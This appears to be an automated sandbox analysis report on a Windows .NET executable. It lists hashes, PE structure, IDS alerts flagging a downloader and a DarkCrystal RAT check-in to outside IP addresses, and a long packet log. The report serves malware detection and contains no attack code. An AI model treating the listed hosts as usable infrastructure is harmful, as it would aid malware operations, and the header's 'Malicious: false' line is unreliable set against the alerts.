SSDEEP:	3:VLV993J+miJWEoJ8FXzFnXPQYNrN5CiNrv:Vx993DEUUFXoYcip
MD5:	42D70726D75E2125CEBDDF12EE574C1E
SHA1:	ED334665CF55C416CA097479373999D31DCE6380
SHA-256:	FC1855F897D46D3BA5CC791977570B860C8F09A5993CF65FD9FB2C4CCDFE2F96
SHA-512:	D87E67929591FB22A7F054C66E0C58F776F72A8ED3B05DF9044683116A45594476FBC4E2CD633E3363F2FAE8742D995E6B72A04A80645D242DBD5164F5D691AC
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/12/2024 04:52:32..04:52:32, error: 0x800705B4.04:52:38, error: 0x800705B4.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.294721796831206
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Dfim58cp4J.exe
File size:	359'936 bytes
MD5:	1430af130a1e5556185aa87e6d8d933f
SHA1:	4b021c96a33ccb6b032373de33d7c14d9587f74c
SHA256:	030524cc026f8230237b61b5e9142de7db0ddce62212f41f8222ac479d24c1e9
SHA512:	cd41b0f85e34e3a5643ae2086c6d923f1b1030b75e508a854df32794c1a3f45cc255e71f828825ec45419f0158c2f800b04c2964dc09c0518991356915c7be13
SSDEEP:	6144:XvIyi25uO96sKsGH4OY50+B+foR9aIWWuhFwwbaTapvSA:wFsKSou8/hnWT6vSA
TLSH:	66749E1A61D0CF41C3882F74D1A7862A23B5A4D3367BF79F2E8911E56D423F18D067EA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]+g.................t..........N.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45924e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672B5D2E [Wed Nov 6 12:12:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x59200	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x538	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x57254	0x57400	9d7cacf0276c627b0c4cac188949549d	False	0.7321868284383954	data	7.31314495180415	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5a000	0x538	0x600	9dab3bbfa1feae5fb78f081451a49d44	False	0.3977864583333333	data	3.967982874963592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5c000	0xc	0x200	b1e1f8ffe1b745c64f5a6787884d99d3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5a0a0	0x2ac	data			0.4473684210526316
RT_MANIFEST	0x5a34c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T07:32:59.711006+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49720	20.233.83.145	443	TCP
2024-12-10T07:32:59.711006+0100	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.7	49720	20.233.83.145	443	TCP
2024-12-10T07:33:30.932391+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49797	188.120.227.56	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 07:32:48.438294888 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:48.438349009 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:48.438446045 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:48.453233957 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:48.453259945 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.047832012 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.047971964 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:50.052108049 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:50.052136898 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.052386999 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.102890015 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:50.147340059 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.986171961 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.986387968 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.986428976 CET	443	49702	20.233.83.145	192.168.2.7
Dec 10, 2024 07:32:50.986519098 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:50.986569881 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:51.012743950 CET	49702	443	192.168.2.7	20.233.83.145
Dec 10, 2024 07:32:51.161011934 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:51.161060095 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:51.161137104 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:51.161655903 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:51.161668062 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.378536940 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.378664017 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.392357111 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.392373085 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.392633915 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.393937111 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.439333916 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.847263098 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.848351955 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.848474026 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.848475933 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.848500967 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.848539114 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.848546982 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.856679916 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.856765032 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.856777906 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.865098953 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.865200043 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.865206003 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.873512983 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.873605013 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.873610973 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.916861057 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.916891098 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:52.963685036 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:52.967715025 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.010561943 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.040585995 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.044395924 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.044490099 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.044498920 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.052263975 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.052423000 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.052433014 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.059794903 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.059910059 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.059922934 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.067423105 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.067481995 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.067492008 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.075238943 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.075295925 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.075304031 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.090574026 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.090615988 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.090642929 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.090662956 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.090702057 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.098560095 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.106132984 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.106173038 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.106250048 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.106257915 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.106314898 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.111982107 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.117945910 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.118001938 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.118007898 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.123889923 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.123945951 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.123951912 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.166934013 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.166940928 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.213781118 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.259525061 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259536982 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259581089 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259605885 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259619951 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259757042 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.259777069 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.259919882 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.281608105 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.281615973 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.281650066 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.281663895 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.281732082 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.281745911 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.281757116 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.305816889 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.305840015 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.305874109 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.306044102 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.306062937 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.354497910 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.362355947 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.362365961 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.362406969 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.362421036 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.362492085 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.362502098 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.362549067 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.442414999 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.442426920 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.442471981 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.442503929 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.442507029 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.442524910 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.442568064 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.442579031 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.462642908 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.462661982 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.462723970 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.462732077 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.462810993 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.479722023 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.479741096 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.479804993 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.479810953 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.479845047 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.479862928 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.492507935 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.492527962 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.492588997 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.492594957 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.492640972 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.504323959 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.504343033 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.504406929 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.504415035 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.504462004 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.517793894 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.517815113 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.517891884 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.517898083 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.517941952 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.619338989 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.619359970 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.619461060 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.619474888 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.619520903 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.629846096 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.629862070 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.629933119 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.629940033 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.629987001 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.639420986 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.639441013 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.639519930 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.639532089 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.639585972 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.648490906 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.648510933 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.648564100 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.648588896 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.648636103 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.648649931 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.656131983 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.656157017 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.656197071 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.656224012 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.656267881 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.656267881 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.664380074 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.664398909 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.664473057 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.664499044 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.664540052 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.673233032 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.673299074 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.673300982 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.673326015 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.673355103 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.673377991 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.707952976 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.707973957 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.708077908 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.708103895 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.708148956 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.812442064 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.812459946 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.812552929 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.812581062 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.812597036 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.812625885 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.820324898 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.820341110 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.820440054 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.820470095 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.820522070 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.827327967 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.827346087 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.827416897 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.827424049 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.827471972 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.835283995 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.835299969 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.835380077 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.835386992 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.835431099 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.843257904 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.843274117 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.843333960 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.843338966 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.843377113 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.850754976 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.850771904 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.850828886 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.850836039 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.850862026 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.850873947 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.858664036 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.858680964 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.858758926 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.858764887 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.858812094 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.900191069 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.900213957 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.900340080 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:53.900347948 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:53.900393963 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:54.005152941 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.005179882 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.005290985 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:54.005317926 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.005364895 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:54.011991978 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.012016058 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.012115002 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:54.012140989 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.012209892 CET	49704	443	192.168.2.7	185.199.110.133
Dec 10, 2024 07:32:54.020201921 CET	443	49704	185.199.110.133	192.168.2.7
Dec 10, 2024 07:32:54.020225048 CET	443	49704	185.199.110.133	192.168.2.7
